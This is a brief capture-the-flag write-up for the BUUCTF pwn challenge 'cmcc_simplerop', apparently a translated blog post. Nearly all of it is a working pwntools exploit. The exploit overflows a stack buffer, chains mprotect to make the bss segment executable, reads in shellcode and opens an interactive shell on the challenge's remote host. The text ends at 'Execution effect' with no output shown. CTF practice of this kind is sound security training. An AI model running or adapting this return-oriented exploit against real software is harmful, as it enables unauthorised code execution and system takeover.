BUUCTF-cmcc_simplerop
Opened NX
IDA decompilation
The program is very simple and the loopholes are also visible at a glance
There is no system in the program. There are many solutions to this problem. Here we use the mprotect method to modify the bss segment and execute the shellcode.
exploit:
#coding:utf-8
from pwn import *
#p=process('simplerop')
p=remote('node3.buuoj.cn',29617)
elf=ELF('simplerop')
#0x0809de85 : pop ebp ; pop esi ; pop edi ; ret
payload='a'*32+p32(elf.symbols['mprotect'])+p32(0x0809de85)+p32(0x080EB000)+p32(0x1000)+p32(0x7)+p32(elf.symbols['read'])+p32(0x0809de85)+p32(0)+p32(0x080EBF80)+p32(0x100)+p32(0x080EBF80)
p.sendlineafter('nput :',payload)
sleep(0.2)
payload=asm(shellcraft.sh())
p.sendline(payload)
p.interactive()
Execution effect